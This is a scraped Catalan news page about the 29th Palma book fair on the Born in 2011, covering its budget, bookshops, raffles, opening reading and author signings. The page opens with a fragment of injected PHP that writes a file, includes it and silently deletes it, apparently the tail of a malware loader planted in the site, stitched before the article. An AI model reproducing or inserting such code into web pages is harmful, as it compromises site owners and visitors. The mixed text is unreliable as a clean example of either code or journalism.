");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Els llibres tornen a ocupar el Born
Cercador de Notícies
Calendari de notícies
27/05/2011 Dari de Balears Maria Llull

Els llibres tornen a ocupar el Born

El passeig del Born de Palma es converteix a partir d'avui, i fins al proper 5 de juny, en una llibreria somiada per qualsevol amant de la lectura. Amb un pressupost de prop de 73.000 euros i 15 llibreries participants, més que mai, la XXIX Fira del Llibre es presenta amb algunes novetats, com els sortejos que es duran a terme per premiar els compradors amb viatges en globus, sopars, circuits d'spa i, com no podia ser d'una altra manera, lots de llibres. A més, les activitats que s'hi facin es podran seguir a la xarxa a través de Twitter. El serveis de Fires de l'Idi i el Gremi de Llibreters han estat els encarregats d'organitzar aquesta mostra, que no serà només un aparador comercial, sinó que inclourà activitats tradicionals, com la signatura de llibres, i innovadores, com una cercavila.

L'escriptora mallorquina Llucia Ramis donarà el sus a la Fira amb la lectura del tradicional pregó, que l'any passat fou llegit per Margalida Capellà. Els caps de setmana els infants seran els protagonistes dels matins, amb activitats que inclouran contacontes. Tampoc no hi faltarà la música, de la mà de la Federació de Corals. El president del Gremi de Llibreters, Francesc Moll, és bastant positiu quant a les perspectives de vendes d'aquesta Fira del Llibre, unes xifres que poden arribar a suposar "entre un 5 i un 10% de la facturació total de l'any".
Aquest esdeveniment fusiona dos aspectes que, malgrat que de vegades pareix que siguin incompatibles, són
una part important del motor de qualsevol economia: la cultura i el comerç. "Ens hem de llevar un poc de damunt el tema de la crisi, perquè com més psicosi hi ha, més crisi es genera", considera Francesc Moll, sense oblidar "la importància d'exercicir un consum responsable", hi afegeix.

Les presentacions de llibres tindran lloc cada dia en els diferents estands que ocuparan els 25 expositors que participen en l'edició d'enguany. Pel que fa a les signatures d'obres, els lectors es podran trobar amb autors com Rosa Maria Colom, Emilio Arnao, Gema Bonnín, Juan Pablo Caja, Pablo Caamaño, Jaime Alberto Nicolau, Juan Planas, Josep-Joan Rosselló i Joan Queralt. L'horari de la XXIX Fira del Llibre serà de 10 a 14 i de 17 a 21, tot i que els divendres, dissabtes i diumenges els visitants podran ser pel Born fins a les 21.30 hores.

Anar a notícia

Recomanar
Comentar
Comentaris (0)